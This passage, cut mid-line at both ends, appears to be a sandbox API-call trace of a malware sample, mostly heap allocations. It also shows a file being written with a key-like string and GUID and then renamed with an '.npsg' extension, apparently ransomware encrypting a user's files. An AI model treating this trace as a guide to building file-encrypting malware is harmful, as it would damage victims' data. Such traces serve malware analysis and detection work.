(HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0238.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0238.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0238.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.023] GetCurrentThreadId () returned 0x5b4 [0238.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0238.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0238.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0238.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0238.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34008c0 [0238.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0238.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0238.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0238.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0238.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0238.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400860 [0238.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0238.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0238.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0238.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0238.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400878 [0238.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0238.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0238.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0238.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400848 [0238.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0238.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34008d8 [0238.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0238.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0238.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34008a8 [0238.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400890 [0238.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34008f0 [0238.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400890 | out: hHeap=0x620000) returned 1 [0238.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400890 [0238.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008a8 | out: hHeap=0x620000) returned 1 [0238.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0238.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0238.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0238.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400860 | out: hHeap=0x620000) returned 1 [0238.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400860 [0238.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0238.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008c0 | out: hHeap=0x620000) returned 1 [0238.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0238.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008f0 | out: hHeap=0x620000) returned 1 [0238.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0238.025] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.025] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b948 [0238.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0238.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0238.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400860 | out: hHeap=0x620000) returned 1 [0238.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0238.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0238.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0238.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0238.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0238.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0238.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0238.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0238.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0238.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400890 | out: hHeap=0x620000) returned 1 [0238.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0238.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008d8 | out: hHeap=0x620000) returned 1 [0238.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0238.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400878 | out: hHeap=0x620000) returned 1 [0238.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400848 | out: hHeap=0x620000) returned 1 [0238.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0238.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0238.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0238.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400830 | out: hHeap=0x620000) returned 1 [0238.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3409878 | out: hHeap=0x620000) returned 1 [0238.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0238.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0238.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0238.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0238.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0238.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0238.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.027] WriteFile (in: hFile=0x644, lpBuffer=0x64e690*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x64e690*, lpNumberOfBytesWritten=0x39afb14*=0x80, lpOverlapped=0x0) returned 1 [0238.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0238.028] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.028] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0238.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7caa0 [0238.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0238.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0238.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b83cd0 [0238.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7caa0 | out: hHeap=0x620000) returned 1 [0238.028] WriteFile (in: hFile=0x644, lpBuffer=0x3b83cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b83cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0238.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0238.029] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.029] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.029] CloseHandle (hObject=0x644) returned 1 [0238.031] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d7c0 [0238.031] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x3b83cd0 [0238.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d7c0 | out: hHeap=0x620000) returned 1 [0238.032] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.npsg")) returned 1 [0238.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0238.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.033] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70e008 | out: hHeap=0x620000) returned 1 [0238.035] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0 [0238.035] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0238.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0238.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.035] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0238.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7caa0 [0238.035] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0238.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0238.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0238.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0238.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0238.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0238.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0238.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0238.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0238.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: 